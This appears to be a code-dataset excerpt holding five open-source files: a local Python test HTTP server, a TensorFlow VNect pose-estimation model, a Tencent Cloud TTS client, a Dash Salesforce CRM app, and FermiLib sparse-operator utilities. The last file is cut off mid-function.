max_stars_repo_path
stringlengths 4
245
| max_stars_repo_name
stringlengths 7
115
| max_stars_count
int64 101
368k
| id
stringlengths 2
8
| content
stringlengths 6
1.03M
|
---|---|---|---|---|
tests/server.py
|
nickanna42/sprite.js
| 181 |
100404
|
import SimpleHTTPServer
import SocketServer
import os
PORT = 8000
class Allow(SimpleHTTPServer.SimpleHTTPRequestHandler):
def send_head(self):
"""Common code for GET and HEAD commands.
This sends the response code and MIME headers.
Return value is either a file object (which has to be copied
to the outputfile by the caller unless the command was HEAD,
and must be closed by the caller under all circumstances), or
None, in which case the caller has nothing further to do.
"""
path = self.translate_path(self.path)
f = None
if os.path.isdir(path):
for index in "index.html", "index.htm":
index = os.path.join(path, index)
if os.path.exists(index):
path = index
break
else:
return self.list_directory(path)
ctype = self.guess_type(path)
if ctype.startswith('text/'):
mode = 'r'
else:
mode = 'rb'
try:
f = open(path, mode)
except IOError:
self.send_error(404, "File not found")
return None
self.send_response(200)
self.send_header("Content-type", ctype)
self.send_header("Access-Control-Allow-Origin", "*")
if path.endswith("png") or path.endswith("gif") or path.endswith("jpg"):
# 2 minutes cache
self.send_header("Cache-Control", "max-age=120");
self.end_headers()
return f
SocketServer.ThreadingTCPServer.allow_reuse_address = True
httpd = SocketServer.TCPServer(("", PORT), Allow)
print "serving at port", PORT
httpd.serve_forever()
|
src/vnect_model.py
|
Pandinosaurus/VNect
| 220 |
100413
|
#!/usr/bin/env python3
# -*- coding: UTF-8 -*-
# Reference:
# https://github.com/timctho/VNect-tensorflow
# https://github.com/EJShim/vnect_estimator
import tensorflow as tf
import tensorflow.contrib as tc
import numpy as np
import pickle
# in tf.layers.conv2d: default_weight_name = kernel, default_bias_name = bias
# in tc.layers.conv2d: default_weight_name = weights, default_bias_name = biases
class VNect:
def __init__(self):
self.is_training = False
self.input_holder = tf.placeholder(dtype=tf.float32, shape=(None, 368, 368, 3))
self._build_network()
def _build_network(self):
# Conv
self.conv1 = tc.layers.conv2d(self.input_holder, kernel_size=7, padding='same', num_outputs=64, stride=2,
scope='conv1')
self.pool1 = tc.layers.max_pool2d(self.conv1, kernel_size=3, padding='same', scope='pool1')
# Residual block 2a
self.res2a_branch1 = tc.layers.conv2d(self.pool1, kernel_size=1, padding='valid', num_outputs=256,
activation_fn=None, scope='res2a_branch1')
self.res2a_branch2a = tc.layers.conv2d(self.pool1, kernel_size=1, padding='valid', num_outputs=64,
scope='res2a_branch2a')
self.res2a_branch2b = tc.layers.conv2d(self.res2a_branch2a, kernel_size=3, padding='same', num_outputs=64,
scope='res2a_branch2b')
self.res2a_branch2c = tc.layers.conv2d(self.res2a_branch2b, kernel_size=1, padding='valid', num_outputs=256,
activation_fn=None, scope='res2a_branch2c')
self.res2a = tf.add(self.res2a_branch2c, self.res2a_branch1, name='res2a_add')
self.res2a = tf.nn.relu(self.res2a, name='res2a')
# Residual block 2b
self.res2b_branch2a = tc.layers.conv2d(self.res2a, kernel_size=1, padding='valid', num_outputs=64,
scope='res2b_branch2a')
self.res2b_branch2b = tc.layers.conv2d(self.res2b_branch2a, kernel_size=3, padding='same', num_outputs=64,
scope='res2b_branch2b')
self.res2b_branch2c = tc.layers.conv2d(self.res2b_branch2b, kernel_size=1, padding='valid', num_outputs=256,
activation_fn=None, scope='res2b_branch2c')
self.res2b = tf.add(self.res2b_branch2c, self.res2a, name='res2b_add')
self.res2b = tf.nn.relu(self.res2b, name='res2b')
# Residual block 2c
self.res2c_branch2a = tc.layers.conv2d(self.res2b, kernel_size=1, padding='valid', num_outputs=64,
scope='res2c_branch2a')
self.res2c_branch2b = tc.layers.conv2d(self.res2b_branch2a, kernel_size=3, padding='same', num_outputs=64,
scope='res2c_branch2b')
self.res2c_branch2c = tc.layers.conv2d(self.res2c_branch2b, kernel_size=1, padding='valid', num_outputs=256,
activation_fn=None, scope='res2c_branch2c')
self.res2c = tf.add(self.res2c_branch2c, self.res2b, name='res2c_add')
self.res2c = tf.nn.relu(self.res2c, name='res2c')
# Residual block 3a
self.res3a_branch1 = tc.layers.conv2d(self.res2c, kernel_size=1, padding='valid', num_outputs=512,
activation_fn=None, stride=2, scope='res3a_branch1')
self.res3a_branch2a = tc.layers.conv2d(self.res2c, kernel_size=1, padding='valid', num_outputs=128, stride=2,
scope='res3a_branch2a')
self.res3a_branch2b = tc.layers.conv2d(self.res3a_branch2a, kernel_size=3, padding='same', num_outputs=128,
scope='res3a_branch2b')
self.res3a_branch2c = tc.layers.conv2d(self.res3a_branch2b, kernel_size=1, padding='valid', num_outputs=512,
activation_fn=None, scope='res3a_branch2c')
self.res3a = tf.add(self.res3a_branch2c, self.res3a_branch1, name='res3a_add')
self.res3a = tf.nn.relu(self.res3a, name='res3a')
# Residual block 3b
self.res3b_branch2a = tc.layers.conv2d(self.res3a, kernel_size=1, padding='valid', num_outputs=128,
scope='res3b_branch2a')
self.res3b_branch2b = tc.layers.conv2d(self.res3b_branch2a, kernel_size=3, padding='same', num_outputs=128,
scope='res3b_branch2b')
self.res3b_branch2c = tc.layers.conv2d(self.res3b_branch2b, kernel_size=1, padding='valid', num_outputs=512,
activation_fn=None, scope='res3b_branch2c')
self.res3b = tf.add(self.res3b_branch2c, self.res3a, name='res3b_add')
self.res3b = tf.nn.relu(self.res3b, name='res3b')
# Residual block 3c
self.res3c_branch2a = tc.layers.conv2d(self.res3b, kernel_size=1, padding='valid', num_outputs=128,
scope='res3c_branch2a')
self.res3c_branch2b = tc.layers.conv2d(self.res3c_branch2a, kernel_size=3, padding='same', num_outputs=128,
scope='res3c_branch2b')
self.res3c_branch2c = tc.layers.conv2d(self.res3c_branch2b, kernel_size=1, padding='valid', num_outputs=512,
activation_fn=None, scope='res3c_branch2c')
self.res3c = tf.add(self.res3c_branch2c, self.res3b, name='res3c_add')
self.res3c = tf.nn.relu(self.res3c, name='res3c')
# Residual block 3d
self.res3d_branch2a = tc.layers.conv2d(self.res3c, kernel_size=1, padding='valid', num_outputs=128,
scope='res3d_branch2a')
self.res3d_branch2b = tc.layers.conv2d(self.res3d_branch2a, kernel_size=3, padding='same', num_outputs=128,
scope='res3d_branch2b')
self.res3d_branch2c = tc.layers.conv2d(self.res3d_branch2b, kernel_size=1, padding='valid', num_outputs=512,
activation_fn=None, scope='res3d_branch2c')
self.res3d = tf.add(self.res3d_branch2c, self.res3c, name='res3d_add')
self.res3d = tf.nn.relu(self.res3d, name='res3d')
# Residual block 4a
self.res4a_branch1 = tc.layers.conv2d(self.res3d, kernel_size=1, padding='valid', num_outputs=1024,
activation_fn=None, stride=2, scope='res4a_branch1')
self.res4a_branch2a = tc.layers.conv2d(self.res3d, kernel_size=1, padding='valid', num_outputs=256, stride=2,
scope='res4a_branch2a')
self.res4a_branch2b = tc.layers.conv2d(self.res4a_branch2a, kernel_size=3, padding='same', num_outputs=256,
scope='res4a_branch2b')
self.res4a_branch2c = tc.layers.conv2d(self.res4a_branch2b, kernel_size=1, padding='valid', num_outputs=1024,
activation_fn=None, scope='res4a_branch2c')
self.res4a = tf.add(self.res4a_branch2c, self.res4a_branch1, name='res4a_add')
self.res4a = tf.nn.relu(self.res4a, name='res4a')
# Residual block 4b
self.res4b_branch2a = tc.layers.conv2d(self.res4a, kernel_size=1, padding='valid', num_outputs=256,
scope='res4b_branch2a')
self.res4b_branch2b = tc.layers.conv2d(self.res4b_branch2a, kernel_size=3, padding='same', num_outputs=256,
scope='res4b_branch2b')
self.res4b_branch2c = tc.layers.conv2d(self.res4b_branch2b, kernel_size=1, padding='valid', num_outputs=1024,
activation_fn=None, scope='res4b_branch2c')
self.res4b = tf.add(self.res4b_branch2c, self.res4a, name='res4b_add')
self.res4b = tf.nn.relu(self.res4b, name='res4b')
# Residual block 4c
self.res4c_branch2a = tc.layers.conv2d(self.res4b, kernel_size=1, padding='valid', num_outputs=256,
scope='res4c_branch2a')
self.res4c_branch2b = tc.layers.conv2d(self.res4c_branch2a, kernel_size=3, padding='same', num_outputs=256,
scope='res4c_branch2b')
self.res4c_branch2c = tc.layers.conv2d(self.res4c_branch2b, kernel_size=1, padding='valid', num_outputs=1024,
activation_fn=None, scope='res4c_branch2c')
self.res4c = tf.add(self.res4c_branch2c, self.res4b, name='res4c_add')
self.res4c = tf.nn.relu(self.res4c, name='res4c')
# Residual block 4d
self.res4d_branch2a = tc.layers.conv2d(self.res4c, kernel_size=1, padding='valid', num_outputs=256,
scope='res4d_branch2a')
self.res4d_branch2b = tc.layers.conv2d(self.res4d_branch2a, kernel_size=3, padding='same', num_outputs=256,
scope='res4d_branch2b')
self.res4d_branch2c = tc.layers.conv2d(self.res4d_branch2b, kernel_size=1, padding='valid', num_outputs=1024,
activation_fn=None, scope='res4d_branch2c')
self.res4d = tf.add(self.res4d_branch2c, self.res4c, name='res4d_add')
self.res4d = tf.nn.relu(self.res4d, name='res4d')
# Residual block 4e
self.res4e_branch2a = tc.layers.conv2d(self.res4d, kernel_size=1, padding='valid', num_outputs=256,
scope='res4e_branch2a')
self.res4e_branch2b = tc.layers.conv2d(self.res4e_branch2a, kernel_size=3, padding='same', num_outputs=256,
scope='res4e_branch2b')
self.res4e_branch2c = tc.layers.conv2d(self.res4e_branch2b, kernel_size=1, padding='valid', num_outputs=1024,
activation_fn=None, scope='res4e_branch2c')
self.res4e = tf.add(self.res4e_branch2c, self.res4d, name='res4e_add')
self.res4e = tf.nn.relu(self.res4e, name='res4e')
# Residual block 4f
self.res4f_branch2a = tc.layers.conv2d(self.res4e, kernel_size=1, padding='valid', num_outputs=256,
scope='res4f_branch2a')
self.res4f_branch2b = tc.layers.conv2d(self.res4f_branch2a, kernel_size=3, padding='same', num_outputs=256,
scope='res4f_branch2b')
self.res4f_branch2c = tc.layers.conv2d(self.res4f_branch2b, kernel_size=1, padding='valid', num_outputs=1024,
activation_fn=None, scope='res4f_branch2c')
self.res4f = tf.add(self.res4f_branch2c, self.res4e, name='res4f_add')
self.res4f = tf.nn.relu(self.res4f, name='res4f')
# Residual block 5a
self.res5a_branch2a_new = tc.layers.conv2d(self.res4f, kernel_size=1, padding='valid', num_outputs=512,
scope='res5a_branch2a_new')
self.res5a_branch2b_new = tc.layers.conv2d(self.res5a_branch2a_new, kernel_size=3, padding='same',
num_outputs=512, scope='res5a_branch2b_new')
self.res5a_branch2c_new = tc.layers.conv2d(self.res5a_branch2b_new, kernel_size=1, padding='valid',
num_outputs=1024, activation_fn=None, scope='res5a_branch2c_new')
self.res5a_branch1_new = tc.layers.conv2d(self.res4f, kernel_size=1, padding='valid', num_outputs=1024,
activation_fn=None, scope='res5a_branch1_new')
self.res5a = tf.add(self.res5a_branch2c_new, self.res5a_branch1_new, name='res5a_add')
self.res5a = tf.nn.relu(self.res5a, name='res5a')
# Residual block 5b
self.res5b_branch2a_new = tc.layers.conv2d(self.res5a, kernel_size=1, padding='valid', num_outputs=256,
scope='res5b_branch2a_new')
self.res5b_branch2b_new = tc.layers.conv2d(self.res5b_branch2a_new, kernel_size=3, padding='same',
num_outputs=128, scope='res5b_branch2b_new')
self.res5b_branch2c_new = tc.layers.conv2d(self.res5b_branch2b_new, kernel_size=1, padding='valid',
num_outputs=256, scope='res5b_branch2c_new')
# Transpose Conv
self.res5c_branch1a = tf.layers.conv2d_transpose(self.res5b_branch2c_new, kernel_size=4, filters=63,
activation=None, strides=2, padding='same', use_bias=False,
name='res5c_branch1a')
self.res5c_branch2a = tf.layers.conv2d_transpose(self.res5b_branch2c_new, kernel_size=4, filters=128,
activation=None, strides=2, padding='same', use_bias=False,
name='res5c_branch2a')
self.bn5c_branch2a = tc.layers.batch_norm(self.res5c_branch2a, scale=True, is_training=self.is_training,
scope='bn5c_branch2a')
self.bn5c_branch2a = tf.nn.relu(self.bn5c_branch2a)
self.res5c_delta_x, self.res5c_delta_y, self.res5c_delta_z = tf.split(self.res5c_branch1a, num_or_size_splits=3,
axis=3)
self.res5c_branch1a_sqr = tf.multiply(self.res5c_branch1a, self.res5c_branch1a, name='res5c_branch1a_sqr')
self.res5c_delta_x_sqr, self.res5c_delta_y_sqr, self.res5c_delta_z_sqr = tf.split(self.res5c_branch1a_sqr,
num_or_size_splits=3, axis=3)
self.res5c_bone_length_sqr = tf.add(tf.add(self.res5c_delta_x_sqr, self.res5c_delta_y_sqr),
self.res5c_delta_z_sqr)
self.res5c_bone_length = tf.sqrt(self.res5c_bone_length_sqr)
self.res5c_branch2a_feat = tf.concat(
[self.bn5c_branch2a, self.res5c_delta_x, self.res5c_delta_y, self.res5c_delta_z, self.res5c_bone_length],
axis=3, name='res5c_branch2a_feat')
self.res5c_branch2b = tc.layers.conv2d(self.res5c_branch2a_feat, kernel_size=3, padding='same', num_outputs=128,
scope='res5c_branch2b')
self.res5c_branch2c = tf.layers.conv2d(self.res5c_branch2b, kernel_size=1, padding='valid', filters=84,
activation=None, use_bias=False, name='res5c_branch2c')
# print(self.res5c_branch2c.get_shape())
self.heatmap, self.x_heatmap, self.y_heatmap, self.z_heatmap = tf.split(self.res5c_branch2c,
num_or_size_splits=4, axis=3)
def load_weights(self, sess, params_file):
# Read pretrained model file
model_weights = pickle.load(open(params_file, 'rb'))
# For each layer each var
with tf.variable_scope('', reuse=True):
for variable in tf.global_variables():
var_name = variable.name.split(':')[0]
# print(var_name)
self.assign_weights_from_dict(var_name, model_weights, sess)
@staticmethod
def assign_weights_from_dict(var_name, model_weights, sess):
with tf.variable_scope('', reuse=True):
var_tf = tf.get_variable(var_name)
print('assigning', var_tf)
sess.run(tf.assign(var_tf, model_weights[var_name]))
np.testing.assert_allclose(var_tf.eval(sess), model_weights[var_name])
if __name__ == '__main__':
model = VNect()
print('VNect building successfully.')
|
tencentcloud/tts/v20190823/tts_client.py
|
PlasticMem/tencentcloud-sdk-python
| 465 |
100506
|
<reponame>PlasticMem/tencentcloud-sdk-python
# -*- coding: utf8 -*-
# Copyright (c) 2017-2021 THL A29 Limited, a Tencent company. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import json
from tencentcloud.common.exception.tencent_cloud_sdk_exception import TencentCloudSDKException
from tencentcloud.common.abstract_client import AbstractClient
from tencentcloud.tts.v20190823 import models
class TtsClient(AbstractClient):
_apiVersion = '2019-08-23'
_endpoint = 'tts.tencentcloudapi.com'
_service = 'tts'
def CreateTtsTask(self, request):
"""本接口服务对10万字符以内的文本进行语音合成,异步返回音频结果。满足一次性合成较长文本的客户需求,如阅读播报、新闻媒体等场景。
<li>支持音频格式:mp3,wav,pcm</li>
<li>支持音频采样率:16000 Hz, 8000 Hz</li>
<li>支持中文普通话、英文、中英文混读、粤语合成</li>
<li>支持语速、音量设置</li>
<li>支持回调或轮询的方式获取结果,结果获取请参考 长文本语音合成结果查询。</li>
<li>长文本语音合成任务完成后,合成音频结果在服务端可保存24小时</li>
:param request: Request instance for CreateTtsTask.
:type request: :class:`tencentcloud.tts.v20190823.models.CreateTtsTaskRequest`
:rtype: :class:`tencentcloud.tts.v20190823.models.CreateTtsTaskResponse`
"""
try:
params = request._serialize()
body = self.call("CreateTtsTask", params)
response = json.loads(body)
if "Error" not in response["Response"]:
model = models.CreateTtsTaskResponse()
model._deserialize(response["Response"])
return model
else:
code = response["Response"]["Error"]["Code"]
message = response["Response"]["Error"]["Message"]
reqid = response["Response"]["RequestId"]
raise TencentCloudSDKException(code, message, reqid)
except Exception as e:
if isinstance(e, TencentCloudSDKException):
raise
else:
raise TencentCloudSDKException(e.message, e.message)
def DescribeTtsTaskStatus(self, request):
"""在调用长文本语音合成请求接口后,有回调和轮询两种方式获取识别结果。
<li>当采用回调方式时,合成完毕后会将结果通过 POST 请求的形式通知到用户在请求时填写的回调 URL,具体请参见 长文本语音合成结果查询 。</li>
<li>当采用轮询方式时,需要主动提交任务ID来轮询识别结果,共有任务成功、等待、执行中和失败四种结果,具体信息请参见下文说明。</li>
:param request: Request instance for DescribeTtsTaskStatus.
:type request: :class:`tencentcloud.tts.v20190823.models.DescribeTtsTaskStatusRequest`
:rtype: :class:`tencentcloud.tts.v20190823.models.DescribeTtsTaskStatusResponse`
"""
try:
params = request._serialize()
body = self.call("DescribeTtsTaskStatus", params)
response = json.loads(body)
if "Error" not in response["Response"]:
model = models.DescribeTtsTaskStatusResponse()
model._deserialize(response["Response"])
return model
else:
code = response["Response"]["Error"]["Code"]
message = response["Response"]["Error"]["Message"]
reqid = response["Response"]["RequestId"]
raise TencentCloudSDKException(code, message, reqid)
except Exception as e:
if isinstance(e, TencentCloudSDKException):
raise
else:
raise TencentCloudSDKException(e.message, e.message)
def TextToVoice(self, request):
"""腾讯云语音合成技术(TTS)可以将任意文本转化为语音,实现让机器和应用张口说话。
腾讯TTS技术可以应用到很多场景,比如,移动APP语音播报新闻;智能设备语音提醒;依靠网上现有节目或少量录音,快速合成明星语音,降低邀约成本;支持车载导航语音合成的个性化语音播报。
内测期间免费使用。
:param request: Request instance for TextToVoice.
:type request: :class:`tencentcloud.tts.v20190823.models.TextToVoiceRequest`
:rtype: :class:`tencentcloud.tts.v20190823.models.TextToVoiceResponse`
"""
try:
params = request._serialize()
body = self.call("TextToVoice", params)
response = json.loads(body)
if "Error" not in response["Response"]:
model = models.TextToVoiceResponse()
model._deserialize(response["Response"])
return model
else:
code = response["Response"]["Error"]["Code"]
message = response["Response"]["Error"]["Message"]
reqid = response["Response"]["RequestId"]
raise TencentCloudSDKException(code, message, reqid)
except Exception as e:
if isinstance(e, TencentCloudSDKException):
raise
else:
raise TencentCloudSDKException(e.message, e.message)
|
apps/dash-salesforce-crm/index.py
|
JeroenvdSande/dash-sample-apps
| 2,332 |
100563
|
import dash
import dash_core_components as dcc
import dash_html_components as html
from dash.dependencies import Input, Output, State
from app import sf_manager, app
from panels import opportunities, cases, leads
server = app.server
app.layout = html.Div(
[
html.Div(
className="row header",
children=[
html.Button(id="menu", children=dcc.Markdown("≡")),
html.Span(
className="app-title",
children=[
dcc.Markdown("**CRM App**"),
html.Span(
id="subtitle",
children=dcc.Markdown("  using Salesforce API"),
style={"font-size": "1.8rem", "margin-top": "15px"},
),
],
),
html.Img(src=app.get_asset_url("logo.png")),
html.A(
id="learn_more",
children=html.Button("Learn More"),
href="https://plot.ly/dash/",
),
],
),
html.Div(
id="tabs",
className="row tabs",
children=[
dcc.Link("Opportunities", href="/"),
dcc.Link("Leads", href="/"),
dcc.Link("Cases", href="/"),
],
),
html.Div(
id="mobile_tabs",
className="row tabs",
style={"display": "none"},
children=[
dcc.Link("Opportunities", href="/"),
dcc.Link("Leads", href="/"),
dcc.Link("Cases", href="/"),
],
),
dcc.Store( # opportunities df
id="opportunities_df",
data=sf_manager.get_opportunities().to_json(orient="split"),
),
dcc.Store( # leads df
id="leads_df", data=sf_manager.get_leads().to_json(orient="split")
),
dcc.Store(
id="cases_df", data=sf_manager.get_cases().to_json(orient="split")
), # cases df
dcc.Location(id="url", refresh=False),
html.Div(id="tab_content"),
html.Link(
href="https://use.fontawesome.com/releases/v5.2.0/css/all.css",
rel="stylesheet",
),
html.Link(
href="https://fonts.googleapis.com/css?family=Dosis", rel="stylesheet"
),
html.Link(
href="https://fonts.googleapis.com/css?family=Open+Sans", rel="stylesheet"
),
html.Link(
href="https://fonts.googleapis.com/css?family=Ubuntu", rel="stylesheet"
),
],
className="row",
style={"margin": "0%"},
)
# Update the index
@app.callback(
[
Output("tab_content", "children"),
Output("tabs", "children"),
Output("mobile_tabs", "children"),
],
[Input("url", "pathname")],
)
def display_page(pathname):
tabs = [
dcc.Link("Opportunities", href="/dash-salesforce-crm/opportunities"),
dcc.Link("Leads", href="/dash-salesforce-crm/leads"),
dcc.Link("Cases", href="/dash-salesforce-crm/cases"),
]
if pathname == "/dash-salesforce-crm/opportunities":
tabs[0] = dcc.Link(
dcc.Markdown("**■ Opportunities**"),
href="/dash-salesforce-crm/opportunities",
)
return opportunities.layout, tabs, tabs
elif pathname == "/dash-salesforce-crm/cases":
tabs[2] = dcc.Link(
dcc.Markdown("**■ Cases**"), href="/dash-salesforce-crm/cases"
)
return cases.layout, tabs, tabs
tabs[1] = dcc.Link(
dcc.Markdown("**■ Leads**"), href="/dash-salesforce-crm/leads"
)
return leads.layout, tabs, tabs
@app.callback(
Output("mobile_tabs", "style"),
[Input("menu", "n_clicks")],
[State("mobile_tabs", "style")],
)
def show_menu(n_clicks, tabs_style):
if n_clicks:
if tabs_style["display"] == "none":
tabs_style["display"] = "flex"
else:
tabs_style["display"] = "none"
return tabs_style
if __name__ == "__main__":
app.run_server(debug=True)
|
src/fermilib/utils/_sparse_tools.py
|
ProjectQ-Framework/FermiLib
| 102 |
100572
|
# Copyright 2017 ProjectQ-Framework (www.projectq.ch)
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""This module provides functions to interface with scipy.sparse."""
from __future__ import absolute_import
from functools import reduce
from future.utils import iteritems
import itertools
import numpy
import numpy.linalg
import scipy
import scipy.sparse
import scipy.sparse.linalg
from fermilib.config import *
from fermilib.ops import FermionOperator, hermitian_conjugated, normal_ordered
from fermilib.utils import fourier_transform, Grid
from fermilib.utils._jellium import (momentum_vector, position_vector,
grid_indices)
from projectq.ops import QubitOperator
# Make global definitions.
identity_csc = scipy.sparse.identity(2, format='csr', dtype=complex)
pauli_x_csc = scipy.sparse.csc_matrix([[0., 1.], [1., 0.]], dtype=complex)
pauli_y_csc = scipy.sparse.csc_matrix([[0., -1.j], [1.j, 0.]], dtype=complex)
pauli_z_csc = scipy.sparse.csc_matrix([[1., 0.], [0., -1.]], dtype=complex)
q_raise_csc = (pauli_x_csc - 1.j * pauli_y_csc) / 2.
q_lower_csc = (pauli_x_csc + 1.j * pauli_y_csc) / 2.
pauli_matrix_map = {'I': identity_csc, 'X': pauli_x_csc,
'Y': pauli_y_csc, 'Z': pauli_z_csc}
def wrapped_kronecker(operator_1, operator_2):
"""Return the Kronecker product of two sparse.csc_matrix operators."""
return scipy.sparse.kron(operator_1, operator_2, 'csc')
def kronecker_operators(*args):
"""Return the Kronecker product of multiple sparse.csc_matrix operators."""
return reduce(wrapped_kronecker, *args)
def jordan_wigner_ladder_sparse(n_qubits, tensor_factor, ladder_type):
"""Make a matrix representation of a fermion ladder operator.
Args:
index: This is a nonzero integer. The integer indicates the tensor
factor and the sign indicates raising or lowering.
n_qubits(int): Number qubits in the system Hilbert space.
Returns:
The corresponding SparseOperator.
"""
identities = [scipy.sparse.identity(
2 ** tensor_factor, dtype=complex, format='csc')]
parities = (n_qubits - tensor_factor - 1) * [pauli_z_csc]
if ladder_type:
operator = kronecker_operators(identities + [q_raise_csc] + parities)
else:
operator = kronecker_operators(identities + [q_lower_csc] + parities)
return operator
def jordan_wigner_sparse(fermion_operator, n_qubits=None):
"""Initialize a SparseOperator from a FermionOperator.
Args:
fermion_operator(FermionOperator): instance of the FermionOperator
class.
n_qubits(int): Number of qubits.
Returns:
The corresponding SparseOperator.
"""
if n_qubits is None:
from fermilib.utils import count_qubits
n_qubits = count_qubits(fermion_operator)
# Create a list of raising and lowering operators for each orbital.
jw_operators = []
for tensor_factor in range(n_qubits):
jw_operators += [(jordan_wigner_ladder_sparse(n_qubits,
tensor_factor,
0),
jordan_wigner_ladder_sparse(n_qubits,
tensor_factor,
1))]
# Construct the SparseOperator.
n_hilbert = 2 ** n_qubits
values_list = [[]]
row_list = [[]]
column_list = [[]]
for term in fermion_operator.terms:
coefficient = fermion_operator.terms[term]
sparse_matrix = coefficient * scipy.sparse.identity(
2 ** n_qubits, dtype=complex, format='csc')
for ladder_operator in term:
sparse_matrix = sparse_matrix * jw_operators[
ladder_operator[0]][ladder_operator[1]]
if coefficient:
# Extract triplets from sparse_term.
sparse_matrix = sparse_matrix.tocoo(copy=False)
values_list.append(sparse_matrix.data)
(row, column) = sparse_matrix.nonzero()
row_list.append(row)
column_list.append(column)
values_list = numpy.concatenate(values_list)
row_list = numpy.concatenate(row_list)
column_list = numpy.concatenate(column_list)
sparse_operator = scipy.sparse.coo_matrix((
values_list, (row_list, column_list)),
shape=(n_hilbert, n_hilbert)).tocsc(copy=False)
sparse_operator.eliminate_zeros()
return sparse_operator
def qubit_operator_sparse(qubit_operator, n_qubits=None):
"""Initialize a SparseOperator from a QubitOperator.
Args:
qubit_operator(QubitOperator): instance of the QubitOperator class.
n_qubits (int): Number of qubits.
Returns:
The corresponding SparseOperator.
"""
from fermilib.utils import count_qubits
if n_qubits is None:
n_qubits = count_qubits(qubit_operator)
if n_qubits < count_qubits(qubit_operator):
raise ValueError('Invalid number of qubits specified.')
# Construct the SparseOperator.
n_hilbert = 2 ** n_qubits
values_list = [[]]
row_list = [[]]
column_list = [[]]
# Loop through the terms.
for qubit_term in qubit_operator.terms:
tensor_factor = 0
coefficient = qubit_operator.terms[qubit_term]
sparse_operators = [coefficient]
for pauli_operator in qubit_term:
# Grow space for missing identity operators.
if pauli_operator[0] > tensor_factor:
identity_qubits = pauli_operator[0] - tensor_factor
identity = scipy.sparse.identity(
2 ** identity_qubits, dtype=complex, format='csc')
sparse_operators += [identity]
# Add actual operator to the list.
sparse_operators += [pauli_matrix_map[pauli_operator[1]]]
tensor_factor = pauli_operator[0] + 1
# Grow space at end of string unless operator acted on final qubit.
if tensor_factor < n_qubits or not qubit_term:
identity_qubits = n_qubits - tensor_factor
identity = scipy.sparse.identity(
2 ** identity_qubits, dtype=complex, format='csc')
sparse_operators += [identity]
# Extract triplets from sparse_term.
sparse_matrix = kronecker_operators(sparse_operators)
values_list.append(sparse_matrix.tocoo(copy=False).data)
(column, row) = sparse_matrix.nonzero()
column_list.append(column)
row_list.append(row)
# Create sparse operator.
values_list = numpy.concatenate(values_list)
row_list = numpy.concatenate(row_list)
column_list = numpy.concatenate(column_list)
sparse_operator = scipy.sparse.coo_matrix((
values_list, (row_list, column_list)),
shape=(n_hilbert, n_hilbert)).tocsc(copy=False)
sparse_operator.eliminate_zeros()
return sparse_operator
def jw_hartree_fock_state(n_electrons, n_orbitals):
"""Function to product Hartree-Fock state in JW representation."""
occupied = scipy.sparse.csr_matrix([[0], [1]], dtype=float)
psi = 1.
unoccupied = scipy.sparse.csr_matrix([[1], [0]], dtype=float)
for orbital in range(n_electrons):
psi = scipy.sparse.kron(psi, occupied, 'csr')
for orbital in range(n_orbitals - n_electrons):
psi = scipy.sparse.kron(psi, unoccupied, 'csr')
return psi
def jw_number_indices(n_electrons, n_qubits):
"""Return the indices for n_electrons in n_qubits under JW encoding
Calculates the indices for all possible arrangements of n-electrons
within n-qubit orbitals when a Jordan-Wigner encoding is used.
Useful for restricting generic operators or vectors to a particular
particle number space when desired
Args:
n_electrons(int): Number of particles to restrict the operator to
n_qubits(int): Number of qubits defining the total state
Returns:
indices(list): List of indices in a 2^n length array that indicate
the indices of constant particle number within n_qubits
in a Jordan-Wigner encoding.
"""
occupations = itertools.combinations(range(n_qubits), n_electrons)
indices = [sum([2**n for n in occupation])
for occupation in occupations]
return indices
def jw_number_restrict_operator(operator, n_electrons, n_qubits=None):
"""Restrict a Jordan-Wigner encoded operator to a given particle number
Args:
sparse_operator(ndarray or sparse): Numpy operator acting on
the space of n_qubits.
n_electrons(int): Number of particles to restrict the operator to
n_qubits(int): Number of qubits defining the total state
Returns:
new_operator(ndarray or sparse): Numpy operator restricted to
acting on states with the same particle number.
"""
if n_qubits is None:
n_qubits = int(numpy.log2(operator.shape[0]))
select_indices = jw_number_indices(n_electrons, n_qubits)
return operator[numpy.ix_(select_indices, select_indices)]
def get_density_matrix(states, probabilities):
n_qubits = states[0].shape[0]
density_matrix = scipy.sparse.csc_matrix(
(n_qubits, n_qubits), dtype=complex)
for state, probability in zip(states, probabilities):
density_matrix = density_matrix + probability * state * state.getH()
return density_matrix
def is_hermitian(sparse_operator):
"""Test if matrix is Hermitian."""
difference = sparse_operator - sparse_operator.getH()
if difference.nnz:
discrepancy = max(map(abs, difference.data))
if discrepancy > EQ_TOLERANCE:
return False
return True
def get_ground_state(sparse_operator):
"""Compute lowest eigenvalue and eigenstate.
Returns:
eigenvalue: The lowest eigenvalue, a float.
eigenstate: The lowest eigenstate in scipy.sparse csc format.
"""
if not is_hermitian(sparse_operator):
raise ValueError('sparse_operator must be Hermitian.')
values, vectors = scipy.sparse.linalg.eigsh(
sparse_operator, 2, which='SA', maxiter=1e7)
eigenstate = scipy.sparse.csc_matrix(vectors[:, 0])
eigenvalue = values[0]
return eigenvalue, eigenstate.getH()
def sparse_eigenspectrum(sparse_operator):
"""Perform a dense diagonalization.
Returns:
eigenspectrum: The lowest eigenvalues in a numpy array.
"""
dense_operator = sparse_operator.todense()
if is_hermitian(sparse_operator):
eigenspectrum = numpy.linalg.eigvalsh(dense_operator)
else:
eigenspectrum = numpy.linalg.eigvals(dense_operator)
return numpy.sort(eigenspectrum)
def expectation(sparse_operator, state):
"""Compute expectation value of operator with a state.
Args:
state: scipy.sparse.csc vector representing a pure state,
or, a scipy.sparse.csc matrix representing a density matrix.
Returns:
A real float giving expectation value.
Raises:
ValueError: Input state has invalid format.
"""
# Handle density matrix.
if state.shape == sparse_operator.shape:
product = state * sparse_operator
expectation = numpy.sum(product.diagonal())
